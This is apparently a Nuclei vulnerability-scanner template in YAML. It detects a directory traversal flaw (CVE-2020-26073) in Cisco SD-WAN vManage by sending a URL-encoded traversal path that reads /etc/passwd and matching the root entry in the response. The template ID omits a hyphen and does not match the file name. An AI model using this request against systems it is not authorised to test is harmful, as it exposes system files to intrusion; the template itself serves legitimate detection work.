nuclei-templates/cves/2020/CVE-2020-26073.yaml

22 lines
552 B
YAML
Raw Normal View History

id: CVE-202026073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
2021-02-18 05:33:26 +00:00
tags: cve,cve2020,cisco,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body